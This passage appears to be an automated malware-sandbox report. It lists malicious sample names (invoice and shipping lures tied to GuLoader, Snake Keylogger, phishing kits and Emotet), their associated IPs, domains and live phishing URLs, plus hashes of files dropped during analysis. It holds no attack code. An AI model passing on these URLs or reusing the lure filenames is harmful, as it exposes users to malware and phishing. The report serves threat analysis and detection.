                          reallyfreegeoip.org | factura n#U00famero 55242.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3
                          reallyfreegeoip.org | 2024-08-23 Fra. 24-1632 000815 (FACT de B12813622).exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
                          reallyfreegeoip.org | FACTURA.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3
                          reallyfreegeoip.org | FACTURA PENDIENTE DE COBRO P24PM0531563.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3
                          reallyfreegeoip.org | Order Al Fari Asia Project - ORMANALGERIE Quote #2374832-doc.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
                          reallyfreegeoip.org | SecuriteInfo.com.Win32.CrypterX-gen.18599.19099.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
                          reallyfreegeoip.org | Nakliye belgeleri.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
                          checkip.dyndns.com | Statement of Account.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
                          checkip.dyndns.com | FedEx Shipping Confirmation.exe | malicious | GuLoader, Snake Keylogger | 193.122.6.168
                          checkip.dyndns.com | Remesas Aceptadas.PDF.exe | malicious | GuLoader, Snake Keylogger | 193.122.130.0
                          checkip.dyndns.com | factura n#U00famero 55242.exe | malicious | GuLoader, Snake Keylogger | 193.122.130.0
                          checkip.dyndns.com | 2024-08-23 Fra. 24-1632 000815 (FACT de B12813622).exe | malicious | GuLoader, Snake Keylogger | 193.122.6.168
                          checkip.dyndns.com | FACTURA.exe | malicious | GuLoader, Snake Keylogger | 132.226.8.169
                          checkip.dyndns.com | FACTURA PENDIENTE DE COBRO P24PM0531563.exe | malicious | GuLoader, Snake Keylogger | 193.122.6.168
                          checkip.dyndns.com | Order Al Fari Asia Project - ORMANALGERIE Quote #2374832-doc.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
                          checkip.dyndns.com | SecuriteInfo.com.Win32.CrypterX-gen.18599.19099.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
                          checkip.dyndns.com | Nakliye belgeleri.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
                          fp2e7a.wpc.phicdn.net | http://email.e.quickshipping.com/c/eJxszLFSxCAQgOGnId1lYHchWFDY5D042JOdXGJkg45v72ht-88_X03gYiw8cXILUIjBeze1RKEwBLTBu5CDj2gBGWPMD-I7P9wkCSyQjRCcRwKcq1uWSEzW40spdTFkef4YUjZtcp5yvM3lfZ-eqV3XqQZfDawG1jtv0ud8ZeUmfc8b99_PwPp13uQoz1FZDaydq3QulwHUPatmQ3a079vQP7an_-pngp8AAAD__zWIRVU | malicious | Unknown | 192.229.221.95
                          fp2e7a.wpc.phicdn.net | https://t.co/CFNobJuJq9 | malicious | HTMLPhisher | 192.229.221.95
                          fp2e7a.wpc.phicdn.net | https://email-10.moengage.com/v1/emailclick?q=J9hmu1r6QKZrUydA7M0LhmLQ5i7Dg0Nl6MHK33dlRRiHDGLaUmrV29w-y9KVmRzhTLgNQhsm45GxW8V8xKrQoKNDHjB7CRmg_1cweH.uPLe.3eHt_gc8HUYJyNafgEERmJL2LxAT8X7OcG6eGtfAfBO9PAxgYyMwORkMW2Shu_8EgxVomZ4n5YVrJ6BeKFaCmD6d2Q4-0na_EglsL0Brj6yR2v6QG0HeFNJCVHWIDqcMyqe_r88-cETjiVnbQ8n6AdsU8zQ3H7iztnEZXRzETHYdGTm5hvYgsr5Sg7bkrF81eht6fM_e-ibIZP2oMLvBT1zWn_xe_wasEim1gTvVJRTqev1AuuHjN-EARFMZfriSXRqAx2EgGZLcoc2EiPI4kOQISdubWyzK9Xtj10aCP_wAt6KxwJRnrrWNRvn3blBJWnngxtQFXjDGd_qwCgdLvQwPLy5R0skEjnG0HC7MA#V2xjMVEyVlhTWHBSYlhocVRVVktkbGRXWkRSak1XdDVUMVJHYVdKc1NURlVSekExWlZad00xQlVNRDA9 | malicious | HTMLPhisher | 192.229.221.95
                          fp2e7a.wpc.phicdn.net | ocedures.msg | malicious | Unknown | 192.229.221.95
                          https://employment-hr.com/66ccd2230405d/5b8cbe0b82e29621df5c72296fc0599da0566b48/Get hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl8RKvJCjgfWXgpyGiQbouwIVFCzJZdO6C7IEJWnFiPmUdkD_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOJptL-2BsSl02HxRvbllikFuSJtHHDkVwyIj5AuFgiubBu9sTxc8j0-2BQG5wldcZa7WyDp4BZYdRmFKi1MU2RpCFoGVLX1rLVx-2BFFfe8ZtbBDm0OusvqG9hc8jycErQH9w4yo0iZBNb6ruS35AQpqe-2Bn9sSG0dYdsEjJuPPD68-2FQoiA15kbRIRZcVBuBtywmpClclGh64Ps2rLg6E3U3-2Ft-2B24zaJbCf8tvrjozgadicpaRwQ3KIy53pMZsOUCbTeEqGc-3D#bGFtYmVydC5nZW9yZ2lhQGFpZGIub3JnGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl8RKvJCjgfWXgpyGiQbouwIVFCzJZdO6C7IEJWnFiPmUdkD_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOJptL-2BsSl02HxRvbllikFuSJtHHDkVwyIj5AuFgiubBu9sTxc8j0-2BQG5wldcZa7WyDp4BZYdRmFKi1MU2RpCFoGVLX1rLVx-2BFFfe8ZtbBDm0OusvqG9hc8jycErQH9w4yo0iZBNb6ruS35AQpqe-2Bn9sSG0dYdsEjJuPPD68-2FQoiA15kbRIRZcVBuBtywmpClclGh64Ps2rLg6E3U3-2Ft-2B24zaJbCf8tvrjozgadicpaRwQ3KIy53pMZsOUCbTeEqGc-3D#bGFtYmVydC5nZW9yZ2lhQGFpZGIub3JnGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFgXXvv2-2BWxavJhSFh1X9YeE09JxYfGZOrfNXpE1b1zMSec6V_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZNvtRLmuq9nwTUBLvlyUQLSTjA0dDcTtmNJHz5AQBzdlGtncKRz08-2BYDBtkpKhh0KX17i2fmd5it7ecx-2FWvhsbD-2BwYBTTPKQ3j-2FAyMvTur79Dsx-2FPO7GwMrKARE8VWDjAjvStKY75qeeBLXHuDipEV3KKO3k4ABqkQG2RlytfHIDieNQv9UnoJapwQuVaik0jLuTXarvnnfl3sa3LYFT4h4hVVagLZJwfqoXYBXcReN-2F1X4eM9FZF-2BvVOXIZ-2BqDy2Q-3DGet hashmaliciousHTMLPhisherBrowse
                          • 192.229.221.95
                          Order Al Fari Asia Project - ORMANALGERIE Quote #2374832-doc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 192.229.221.95
                          http://www.empoweryourretirement.comGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLOUDFLARENETUSobvious.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                          • 162.159.136.232
                          Madisonwellsmedia546.pdfGet hashmaliciousHTMLPhisherBrowse
                          • 188.114.96.3
                          (No subject) (59).emlGet hashmaliciousHTMLPhisherBrowse
                          • 172.66.47.111
                          https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/Get hashmaliciousUnknownBrowse
                          • 104.21.20.188
                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 188.114.96.3
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 188.114.96.3
                          https://t.co/CFNobJuJq9Get hashmaliciousHTMLPhisherBrowse
                          • 104.17.25.14
                          http://esc-dot-wind-blade-416540.uk.r.appspot.comGet hashmaliciousHTMLPhisherBrowse
                          • 188.114.96.3
                          Status Update ECKY2.htmlGet hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 172.64.41.3
                          ORACLE-BMC-31898USStatement of Account.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 193.122.6.168
                          FedEx Shipping Confirmation.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 193.122.6.168
                          Remesas Aceptadas.PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 193.122.130.0
                          factura n#U00famero 55242.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 193.122.130.0
                          2024-08-23 Fra. 24-1632 000815 (FACT de B12813622).exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 193.122.6.168
                          FACTURA PENDIENTE DE COBRO P24PM0531563.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 193.122.6.168
                          Order Al Fari Asia Project - ORMANALGERIE Quote #2374832-doc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 193.122.6.168
                          Nakliye belgeleri.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 158.101.44.242
                          SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.7591.31980.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 193.122.130.0
                          SOA-Al Daleel -Star Electromechanical.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 158.101.44.242
                          CONTABODEInv-Info98.htmGet hashmaliciousHTMLPhisherBrowse
                          • 62.171.141.146
                          Zahteva za ponudbo #U2013 Katalog vzorcev.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                          • 95.111.243.74
                          AIDHL3290435890.exeGet hashmaliciousFormBookBrowse
                          • 161.97.168.245
                          https://pentaleon.com/?sragyzsragyzGet hashmaliciousUnknownBrowse
                          • 144.91.79.54
                          PO#4510065525.exeGet hashmaliciousFormBookBrowse
                          • 161.97.168.245
                          d8EEfAi7tl.vbsGet hashmaliciousMoDiRATBrowse
                          • 144.91.79.54
                          Payment Swift-67654.pdf.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 161.97.168.245
                          Reservations_00206.vbeGet hashmaliciousAgentTeslaBrowse
                          • 144.91.79.54
                          ExeFile (233).exeGet hashmaliciousEmotetBrowse
                          • 173.212.214.235
                          ExeFile (333).exeGet hashmaliciousEmotetBrowse
                          • 5.189.168.53
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          1138de370e523e824bbca92d049a3777http://email.e.quickshipping.com/c/eJxszLFSxCAQgOGnId1lYHchWFDY5D042JOdXGJkg45v72ht-88_X03gYiw8cXILUIjBeze1RKEwBLTBu5CDj2gBGWPMD-I7P9wkCSyQjRCcRwKcq1uWSEzW40spdTFkef4YUjZtcp5yvM3lfZ-eqV3XqQZfDawG1jtv0ud8ZeUmfc8b99_PwPp13uQoz1FZDaydq3QulwHUPatmQ3a079vQP7an_-pngp8AAAD__zWIRVUGet hashmaliciousUnknownBrowse
                          • 173.222.162.64
                          Status Update ECKY2.htmlGet hashmaliciousUnknownBrowse
                          • 173.222.162.64
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 173.222.162.64
                          Madisonwellsmedia546.pdfGet hashmaliciousUnknownBrowse
                          • 173.222.162.64
                          Inv-Info98.htmGet hashmaliciousHTMLPhisherBrowse
                          • 173.222.162.64
                          ATT09876.htmGet hashmaliciousHTMLPhisherBrowse
                          • 173.222.162.64
                          https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl8RKvJCjgfWXgpyGiQbouwIVFCzJZdO6C7IEJWnFiPmUdkD_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOJptL-2BsSl02HxRvbllikFuSJtHHDkVwyIj5AuFgiubBu9sTxc8j0-2BQG5wldcZa7WyDp4BZYdRmFKi1MU2RpCFoGVLX1rLVx-2BFFfe8ZtbBDm0OusvqG9hc8jycErQH9w4yo0iZBNb6ruS35AQpqe-2Bn9sSG0dYdsEjJuPPD68-2FQoiA15kbRIRZcVBuBtywmpClclGh64Ps2rLg6E3U3-2Ft-2B24zaJbCf8tvrjozgadicpaRwQ3KIy53pMZsOUCbTeEqGc-3D#bGFtYmVydC5nZW9yZ2lhQGFpZGIub3JnGet hashmaliciousUnknownBrowse
                          • 173.222.162.64
                          Gov Annual Salary + Employer - Provided Benefits.pdfGet hashmaliciousPhisherBrowse
                          • 173.222.162.64
                          file.exeGet hashmaliciousUnknownBrowse
                          • 173.222.162.64
                          http://o62arw.dsjpropertymanagementllc.comGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                          • 173.222.162.64
                          28a2c9bd18a11de089ef85a160da29e4Madisonwellsmedia546.pdfGet hashmaliciousHTMLPhisherBrowse
                          • 20.190.159.73
                          (No subject) (59).emlGet hashmaliciousHTMLPhisherBrowse
                          • 20.190.159.73
                          http://email.e.quickshipping.com/c/eJxszLFSxCAQgOGnId1lYHchWFDY5D042JOdXGJkg45v72ht-88_X03gYiw8cXILUIjBeze1RKEwBLTBu5CDj2gBGWPMD-I7P9wkCSyQjRCcRwKcq1uWSEzW40spdTFkef4YUjZtcp5yvM3lfZ-eqV3XqQZfDawG1jtv0ud8ZeUmfc8b99_PwPp13uQoz1FZDaydq3QulwHUPatmQ3a079vQP7an_-pngp8AAAD__zWIRVUGet hashmaliciousUnknownBrowse
                          • 20.190.159.73
                          https://t.co/CFNobJuJq9Get hashmaliciousHTMLPhisherBrowse
                          • 20.190.159.73
                          http://esc-dot-wind-blade-416540.uk.r.appspot.comGet hashmaliciousHTMLPhisherBrowse
                          • 20.190.159.73
                          Status Update ECKY2.htmlGet hashmaliciousUnknownBrowse
                          • 20.190.159.73
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 20.190.159.73
                          file.exeGet hashmaliciousUnknownBrowse
                          • 20.190.159.73
                          Electronic_Receipt_ATT0001.htmGet hashmaliciousHTMLPhisherBrowse
                          • 20.190.159.73
                          https://email-10.moengage.com/v1/emailclick?q=J9hmu1r6QKZrUydA7M0LhmLQ5i7Dg0Nl6MHK33dlRRiHDGLaUmrV29w-y9KVmRzhTLgNQhsm45GxW8V8xKrQoKNDHjB7CRmg_1cweH.uPLe.3eHt_gc8HUYJyNafgEERmJL2LxAT8X7OcG6eGtfAfBO9PAxgYyMwORkMW2Shu_8EgxVomZ4n5YVrJ6BeKFaCmD6d2Q4-0na_EglsL0Brj6yR2v6QG0HeFNJCVHWIDqcMyqe_r88-cETjiVnbQ8n6AdsU8zQ3H7iztnEZXRzETHYdGTm5hvYgsr5Sg7bkrF81eht6fM_e-ibIZP2oMLvBT1zWn_xe_wasEim1gTvVJRTqev1AuuHjN-EARFMZfriSXRqAx2EgGZLcoc2EiPI4kOQISdubWyzK9Xtj10aCP_wAt6KxwJRnrrWNRvn3blBJWnngxtQFXjDGd_qwCgdLvQwPLy5R0skEjnG0HC7MA#V2xjMVEyVlhTWHBSYlhocVRVVktkbGRXWkRSak1XdDVUMVJHYVdKc1NURlVSekExWlZad00xQlVNRDA9Get hashmaliciousHTMLPhisherBrowse
                          • 20.190.159.73
                          54328bd36c14bd82ddaa0c04b25ed9adStatement of Account.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          FedEx Shipping Confirmation.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 188.114.97.3
                          Remesas Aceptadas.PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 188.114.97.3
                          factura n#U00famero 55242.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 188.114.97.3
                          2024-08-23 Fra. 24-1632 000815 (FACT de B12813622).exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 188.114.97.3
                          FACTURA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 188.114.97.3
                          FACTURA PENDIENTE DE COBRO P24PM0531563.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 188.114.97.3
                          Order Al Fari Asia Project - ORMANALGERIE Quote #2374832-doc.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          SecuriteInfo.com.Win32.CrypterX-gen.18599.19099.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          Nakliye belgeleri.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          No context
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1310720
                          Entropy (8bit):0.7263271050864718
                          Encrypted:false
                          SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0e:9JZj5MiKNnNhoxun
                          MD5:D6DDF0FC7D71464E81A1A2738FCF1384
                          SHA1:1E30BAC68987CBE0C666215625A00102F701E450
                          SHA-256:BD83CC9E79636ECFE571BBF83E75FF81E211E91D915BBB6F6B3BAB876DB756F5
                          SHA-512:020F1B38D084AC7749E8B64534AD6C4238577D47B8C257ED5CF75DA7F30A979522588BC5F4A7E4B25B35A1A386ED584A16E6AC21D32335FD1EFE40C88D38E39A
                          Malicious:false
                          Process:C:\Windows\System32\svchost.exe
                          File Type:Extensible storage user DataBase, version 0x620, checksum 0x11f752f5, page size 16384, DirtyShutdown, Windows version 10.0
                          Category:dropped
                          Size (bytes):1310720
                          Entropy (8bit):0.7555973951815156
                          Encrypted:false
                          SSDEEP:1536:tSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:tazaSvGJzYj2UlmOlOL
                          MD5:D8E3EC1A728CADB66CED4E7A75B9D059
                          SHA1:D47B9102ACC3A5E7C3FE2C9CB9539A7B7EA973A1
                          SHA-256:298447743B951526B61895805A3330F90FE1D3A6DC1D508302C7BFFB838E5881
                          SHA-512:5179D24BA4B848FDAC6B272DF87FD41A62B06B9A708F6D7744B1EDF31D1F0D1198141F7DACB487F383EE89755D9B014723B2CA98F6C0B8CD49D4412C1A3A4088
                          Malicious:false
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):16384
                          Entropy (8bit):0.07772046763431725
                          Encrypted:false
                          SSDEEP:3:2tEYepor5ANaAPaU1lqic3FilluxmO+l/SNxOf:Zzpor5ANDPaUiLogmOH
                          MD5:95B9773EB9944800084C57679FA03B9C
                          SHA1:B3E20C865CC9D5BA0E59B55937A7A72067FA9F70
                          SHA-256:EA8B2113D0FEF78DF5B29D97CC9DFB39101A22BB2A0EA77AFB276AB6ABA713F7
                          SHA-512:5BF0C4FD5E6928D33CC8BA732D2AE3E5BCCF55165F3C4BBB7A84C94E888540801BF570F997365CDFC20B6A7635F229370CF92DAC34ED68D4FC04C8E1136BDDDD
                          Malicious:false
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):1.0209242630238817
                          Encrypted:false
                          SSDEEP:192:5zzcOOdrK0BU/Kai0+mTzuiFyZ24IO8m:d7OdtBU/Ka79zuiFyY4IO8m
                          MD5:962A6626910F8BF0E979A83C8CA468F5
                          SHA1:0EC4E8321A4037A059B184F9F20FD9E8E6237DFA
                          SHA-256:E3BB203543E0ABC78D6260D3A9676B6CB05D314C1B9546A1533B207B50D32E66
                          SHA-512:2DC8F282E319677D97F5BA1BE5162343CAD60AB2035D109E0AB4C6534627D2A03A1A041527EA66BEE86EB21B84913BA385A904A677AA30FB8CEE8568B42EFCA2
                          Malicious:false
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):1.020928865887944
                          Encrypted:false
                          SSDEEP:192:UzIatcOTdrK0BU/Kai0+mTzuiFyZ24IO8m:PaFTdtBU/Ka79zuiFyY4IO8m
                          MD5:D66040ACCA9BFF5A5F33B2F68E27159D
                          SHA1:DEB34DFA3F684D75EA7FB756DDF44B423861EB37
                          SHA-256:8527694E3F3EF2954ABC3603D566918CF7A71CF2D79943E3AE541FE804FCEE89
                          SHA-512:13BC00AE564C0B833F242D4BA89A2DCE6AE81D4B9BC8B72A20B2EAC684271A69C894F7A3D428A83E77F65C73D1064211B5A4551D16FEFCC64E1B9F839FF97F02
                          Malicious:false
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):1.0207972695774772
                          Encrypted:false
                          SSDEEP:192:ffRNcO/sdrK0BU/Ka6U+mTzuiFyZ24IO8m:nRl0dtBU/KaT9zuiFyY4IO8m
                          MD5:03A68FB46E2EAC163DFA32DFC3ACC298
                          SHA1:A4E5426F4C05D008FA5DBF7CE96E24DE64E6762E
                          SHA-256:B3593468916DE64B9B4A999EBDC4BF053220B352B2F6E2F80AE87F481A4BD5A0
                          SHA-512:6E8A724E4E3782EAE1CFBF015985E808AC8DEA8E9078F102EAF1766CB26B52A6504A5E7BADB445F0A5C3E4BD27F0E458C5D76CC7B7003520528E650F9F7AD4CC
                          Malicious:false
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):1.0208320194656795
                          Encrypted:false
                          SSDEEP:192:4YccO7drK0BU/KaS0+mTzuiFNZ24IO8m:vc7dtBU/Kar9zuiFNY4IO8m
                          MD5:D2B871D8DF2341EE855893FF075A34AF
                          SHA1:DBA5D1EE79A31B54E33408C25D898E585A4DCAA0
                          SHA-256:40ADE1B4EEAA490C920292588A8BDF4BC205905F6A62B692A6D076EC5553EB8E
                          SHA-512:868F5461681F815FE5A7264DC8602D20240B88C40F5D7A53CEAFF3A6F214E60EB8D9EE224D963F835D042E55C80510D69BFF40AD9089098663E2BAFC7709BB7E
                          Malicious:false
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):1.0207239645442305
                          Encrypted:false
                          SSDEEP:192:EFDhcOTdrK0BU/Ka6E+mTzuiFyZ24IO8m:Y5TdtBU/Kaz9zuiFyY4IO8m
                          MD5:82DFE1F41092A3DE594E0B33E08056BF
                          SHA1:5CD1BDCEB9C011EDA5A405EB55C7C0D3D29A5266
                          SHA-256:0AC734556BFE82A2D4996C4607D614992F99656ED118FDD97CA1AB917E39312C
                          SHA-512:0C0D7808AEE5D89065494E59DC2718B572E0AA124F3B93136C67A41C770F223E146712B050FA1BA0B6D37D0E13810DB4CE1C5DD13639E987944B2679FEE60705
                          Malicious:false
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.5343336477673574
                          Encrypted:false
                          SSDEEP:96:SHsvFggj2arxYidlRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTAGSf/VXTT:SSKC7mGlR30wAAzuiFs+Z24lO8
                          MD5:348F00B1A4C43FE448210D309EB96729
                          SHA1:F6DCDB06464AD5BDE722E775C9A9DD3DE521232C
                          SHA-256:D97610A78E7F9CF8E0FDDF34578395977FED9A299E0E9F29E0F433742EC0AC79
                          SHA-512:F5C53F8E3D11672BE99B9146BB0F1554518F2464D78093D0FA423D346256F8360EC96DA49B5CD2DABAC37E5208B045CA14C9B266F7B9443B4D3937E4D6702F0A
                          Malicious:false
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.5342068398930002
                          Encrypted:false
                          SSDEEP:96:tsGF7p4jhrxYid64RH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTADf/VXT5W:56hmG64R30wAAzuiFjZ24lO8
                          MD5:654FEB9E68B47B14D20A4E0F2F59D3E5
                          SHA1:D875AB640C55204FED916006C26E2FCBDC510453
                          SHA-256:045E02D87210BC0F81D9AFF4018343C053DAD297CB3C0C9D9893684802DB02FB
                          SHA-512:7D2D32B90D5B9AB807B8A8AEB847AD4325726D8752602E72AB876DBFC1E6892FB509B89D49B0516DBB265B524CBADD5A9F47204B7C53AC9CE5514BBECD5CAFCA
                          Malicious:false
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.5.5.6.3.7.3.8.5.8.9.2.6.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.2.5.5.4.3.4.1.2.9.1.8.6.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.0.5.b.9.2.d.-.6.2.d.2.-.4.5.5.b.-.8.e.b.e.-.b.e.0.5.0.4.0.f.6.0.6.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.6.4.-.0.0.0.1.-.0.0.1.5.-.9.f.f.3.-.0.c.7.8.a.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.53433148620342
                          Encrypted:false
                          SSDEEP:96:RFFrDujlrxYid67nRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTADf/VXT5t:ThD4lmG67nR30wAAzuiFjZ24lO8
                          MD5:8E9C9516C8D3FDFBDCE3C85C64FF3928
                          SHA1:D6802D1238F1A96272DB610FD9F30CE9B1868BD0
                          SHA-256:6AC3CEA78A99530DF56E23C9CBEE080C129D7BFA0FC7247C14276A9FE93A4C26
                          SHA-512:0F8E944F1D3B86DD3C241EA9E0D2F77B0104FD74C03331A4FC10EDADF68D983ACFA2A6C723031FF5EFA0C117CD820CDBC757EC9DCE2930040573C9A96C3517EF
                          Malicious:false
